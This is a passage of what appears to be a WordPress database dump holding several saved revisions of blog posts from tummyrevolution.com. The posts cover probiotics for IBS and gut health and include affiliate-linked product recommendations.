Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 07:02:18','2023-10-12 07:02:18','',5551,'https://tummyrevolution.com/?p=5740',0,'revision','',0),(5741,1,'2023-10-12 07:07:44','2023-10-12 07:07:44','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 07:07:44','2023-10-12 07:07:44','',5551,'https://tummyrevolution.com/?p=5741',0,'revision','',0),(5742,1,'2023-10-12 07:26:06','2023-10-12 07:26:06','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 07:26:06','2023-10-12 07:26:06','',5551,'https://tummyrevolution.com/?p=5742',0,'revision','',0),(5743,1,'2023-10-12 07:27:44','2023-10-12 07:27:44','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 07:27:44','2023-10-12 07:27:44','',5551,'https://tummyrevolution.com/?p=5743',0,'revision','',0),(5744,1,'2023-10-12 07:30:07','2023-10-12 07:30:07','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

1. Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

2. Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

3. Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 07:30:07','2023-10-12 07:30:07','',5551,'https://tummyrevolution.com/?p=5744',0,'revision','',0),(5745,1,'2023-10-12 07:30:22','2023-10-12 07:30:22','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

1. Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

2. Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

3. Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS 2023','','inherit','closed','closed','','5551-revision-v1','','','2023-10-12 07:30:22','2023-10-12 07:30:22','',5551,'https://tummyrevolution.com/?p=5745',0,'revision','',0),(5746,1,'2023-10-12 07:44:19','2023-10-12 07:44:19','\n

With so many IBS probiotic supplements available to choose from, it’s hard to know which would suit you best and which one to choose.

When selecting a probiotic for IBS, you need to initially consider factors such as: 

\n\n\n\n
    \n
  • type and severity of your symptoms
  • \n\n\n\n
  • what would be the right dosage for you
  • \n\n\n\n
  • Some people respond better to different strains
  • \n
\n\n\n\n

It may take some time to find the right probiotic and dosage that works best for you. Sometimes this means trying a few different types or brands to find the right one. If you have a sensitive gut start by trying a probiotic with a slightly lower number CFUs such as 1-15 billion CFUs. Choosing a Probiotic with a high number CFUs, such as 50-100+ billion, might have the opposite desired effect on your gut so be cautious. By starting with a lower dosage probiotic you can monitor how you respond and then increase the dosage if you feel this is right for you.

\n\n\n\n

Below are some researched and recommended probiotics based on symptoms to help you navigate your way to the right type for you.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

1. Probiotics for IBS if your primary symptom is diarrhoea:

\n\n\n\n

Optibac Probiotics Saccharomyces Boulardii - Vegan Probiotics for Digestive Health & Occasional Diarrhea, 5 Billion CFU - 80 Capsules

\n\n\n\n\"\"\n\n\n\n

Culturelle Pro Strength Daily Probiotic, Digestive Health Capsules, Supports Occasional Diarrhea, Gas & Bloating, Gluten and Soy Free, 60 Count

\n\n\n\n\"\"\n\n\n\n

2. Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

3. Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n\n\n\n


Conclusion

\n\n\n\n

Living with IBS doesn\'t have to mean enduring constant discomfort. Incorporating the right probiotics into your daily routine could provide the relief you seek by fostering a healthier gut environment. However, it\'s important to note that individual responses to probiotics may vary. Consulting with a healthcare professional before starting any new supplement regimen is recommended, especially if you have underlying health conditions or are taking medications. With the guidance of a healthcare provider, you can select the probiotic strains that align with your needs and take a step toward managing your IBS symptoms effectively.

\n','What type of probiotics works best for IBS ','','inherit','closed','closed','','5526-revision-v1','','','2023-10-12 07:44:19','2023-10-12 07:44:19','',5526,'https://tummyrevolution.com/?p=5746',0,'revision','',0),(5747,1,'2023-10-12 08:26:26','0000-00-00 00:00:00','\n

Yes, probiotics can contribute to gut health. Probiotics are live microorganisms, typically bacteria or yeast, that confer health benefits to the host (usually humans) when consumed in adequate amounts. These microorganisms are similar to the beneficial bacteria that naturally reside in the human gut.The human gastrointestinal tract is home to trillions of microorganisms, collectively known as the gut microbiota. This microbiota plays a crucial role in digestion, nutrient absorption, and the overall health of the digestive system. Probiotics can positively influence the composition and activity of the gut microbiota, promoting a balance of beneficial bacteria.

\n\n\n\n

Here are some ways in which probiotics can support gut health:

\n\n\n\n
    \n
  1. Restoring and Maintaining Balance: Probiotics can help restore the balance of bacteria in the gut. This balance can be disrupted by factors such as antibiotic use, illness, or dietary changes.
  2. \n\n\n\n
  3. Enhancing Digestive Function: Probiotics may aid in the digestion of certain substances and the absorption of nutrients.
  4. \n\n\n\n
  5. Modulating the Immune System: There is evidence to suggest that the gut microbiota plays a role in modulating the immune system. Probiotics may contribute to immune system regulation.
  6. \n\n\n\n
  7. Protecting Against Harmful Bacteria: Some probiotic strains produce substances that inhibit the growth of harmful bacteria in the gut, potentially protecting against infections.
  8. \n\n\n\n
  9. Reducing Symptoms of Certain Digestive Conditions: Probiotics have been studied for their potential to alleviate symptoms of various digestive conditions, including irritable bowel syndrome (IBS), inflammatory bowel diseases (such as Crohn\'s disease and ulcerative colitis), and diarrhea.
  10. \n
\n\n\n\n

It\'s important to note that not all probiotics are the same, and different strains may have different effects. Additionally, the effectiveness of probiotics can depend on factors such as the specific health condition, the dosage, and individual variations in response.

\n\n\n\n

Before adding probiotics to your routine or addressing specific health concerns, it\'s advisable to consult with a healthcare professional who can provide personalized advice based on your health status and needs.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Best Multi Probiotics for Men and Women:

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Does probiotic help improve gut health?','','draft','open','open','','','','','2023-10-12 08:26:26','2023-10-12 08:26:26','',0,'https://tummyrevolution.com/?p=5747',0,'post','',0),(5748,1,'2023-10-12 08:11:44','2023-10-12 08:11:44','\n

\n\n\n\n

Yes, probiotics can contribute to gut health. Probiotics are live microorganisms, typically bacteria or yeast, that confer health benefits to the host (usually humans) when consumed in adequate amounts. These microorganisms are similar to the beneficial bacteria that naturally reside in the human gut.The human gastrointestinal tract is home to trillions of microorganisms, collectively known as the gut microbiota. This microbiota plays a crucial role in digestion, nutrient absorption, and the overall health of the digestive system. Probiotics can positively influence the composition and activity of the gut microbiota, promoting a balance of beneficial bacteria.

\n\n\n\n

Here are some ways in which probiotics can support gut health:

\n\n\n\n
    \n
  1. Restoring and Maintaining Balance: Probiotics can help restore the balance of bacteria in the gut. This balance can be disrupted by factors such as antibiotic use, illness, or dietary changes.
  2. \n\n\n\n
  3. Enhancing Digestive Function: Probiotics may aid in the digestion of certain substances and the absorption of nutrients.
  4. \n\n\n\n
  5. Modulating the Immune System: There is evidence to suggest that the gut microbiota plays a role in modulating the immune system. Probiotics may contribute to immune system regulation.
  6. \n\n\n\n
  7. Protecting Against Harmful Bacteria: Some probiotic strains produce substances that inhibit the growth of harmful bacteria in the gut, potentially protecting against infections.
  8. \n\n\n\n
  9. Reducing Symptoms of Certain Digestive Conditions: Probiotics have been studied for their potential to alleviate symptoms of various digestive conditions, including irritable bowel syndrome (IBS), inflammatory bowel diseases (such as Crohn\'s disease and ulcerative colitis), and diarrhea.
  10. \n
\n\n\n\n

It\'s important to note that not all probiotics are the same, and different strains may have different effects. Additionally, the effectiveness of probiotics can depend on factors such as the specific health condition, the dosage, and individual variations in response.

\n\n\n\n

Before adding probiotics to your routine or addressing specific health concerns, it\'s advisable to consult with a healthcare professional who can provide personalized advice based on your health status and needs.

\n','Does probiotic help improve gut health?','','inherit','closed','closed','','5747-revision-v1','','','2023-10-12 08:11:44','2023-10-12 08:11:44','',5747,'https://tummyrevolution.com/?p=5748',0,'revision','',0),(5749,1,'2023-10-12 08:26:24','2023-10-12 08:26:24','\n

Yes, probiotics can contribute to gut health. Probiotics are live microorganisms, typically bacteria or yeast, that confer health benefits to the host (usually humans) when consumed in adequate amounts. These microorganisms are similar to the beneficial bacteria that naturally reside in the human gut.The human gastrointestinal tract is home to trillions of microorganisms, collectively known as the gut microbiota. This microbiota plays a crucial role in digestion, nutrient absorption, and the overall health of the digestive system. Probiotics can positively influence the composition and activity of the gut microbiota, promoting a balance of beneficial bacteria.

\n\n\n\n

Here are some ways in which probiotics can support gut health:

\n\n\n\n
    \n
  1. Restoring and Maintaining Balance: Probiotics can help restore the balance of bacteria in the gut. This balance can be disrupted by factors such as antibiotic use, illness, or dietary changes.
  2. \n\n\n\n
